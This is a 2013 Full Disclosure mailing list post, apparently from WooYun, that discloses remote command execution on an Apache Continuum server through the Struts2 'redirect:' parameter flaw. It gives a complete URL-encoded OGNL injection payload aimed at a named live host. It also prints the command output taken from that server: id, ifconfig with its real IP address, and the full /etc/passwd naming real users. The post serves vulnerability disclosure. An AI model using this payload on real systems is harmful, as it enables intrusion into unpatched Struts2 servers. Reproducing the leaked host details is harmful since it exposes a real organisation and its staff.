Full Disclosure mailing list archives
Apache Software Foundation A Subsite Remote command execution
From: you help <help.en () wooyun org>
Date: Sun, 13 Oct 2013 17:28:19 +0800
*Abstract:* # Apache,Mind Yourself Apache struts2 a vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution。 *Details:* #show the webroot http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()} /home/continuum/apache-continuum-1.4.1/apps/continuum *Proofs of concept:* #id uid=1001(continuum) gid=1001(continuum) groups=1001(continuum) #/sbin/ifconfig eth0 Link encap:Ethernet HWaddr 00:50:56:ae:00:0b inet addr:140.211.11.54 Bcast:140.211.11.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:feae:b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:22081926 errors:0 dropped:0 overruns:0 frame:0 TX packets:7627912 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:26173286052 (26.1 GB) TX bytes:3491916802 (3.4 GB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:42196069 errors:0 dropped:0 overruns:0 frame:0 TX packets:42196069 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:24001777186 (24.0 GB) TX bytes:24001777186 (24.0 GB) #cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false landscape:x:102:108::/var/lib/landscape:/bin/false gmcdonald:x:1000:1000:gmcdonald,,,:/home/gmcdonald:/bin/bash sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin continuum:x:1001:1001::/home/continuum:/bin/sh archiva:x:1002:1002::/home/archiva:/bin/sh postfix:x:104:113::/var/spool/postfix:/bin/false messagebus:x:105:115::/var/run/dbus:/bin/false avahi:x:106:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false brett:x:1717:1717::/home/brett:/bin/bash mysql:x:107:117:MySQL Server,,,:/var/lib/mysql:/bin/false smmta:x:108:118:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:109:119:Mail Submission Program,,,:/var/lib/sendmail:/bin/false apbackup:x:1718:1718::/home/apbackup:/bin/sh pctony:x:2097:2097::/home/pctony:/bin/bash ntp:x:110:120::/home/ntp:/bin/false evenisse:x:1003:1003:Emmanuel Venisse,,,:/home/evenisse:/bin/bash puppet:x:111:121:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false olamy:x:1004:1004:Olivier Lamy,,,:/home/olamy:/bin/bash usbmux:x:112:46:usbmux daemon,,,:/home/usbmux:/bin/false markt:x:1787:1787:medthomas:/home/markt:/bin/bash -------------------------------------------------------------------------------------------------------------------------------- *Author*:猪猪侠 <http://en.wooyun.org/whitehats/%E7%8C%AA%E7%8C%AA%E4%BE%A0> *From: *http://en.wooyun.org/bugs/wooyun-2013-06?2605
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Apache Software Foundation A Subsite Remote command execution you help (Oct 13)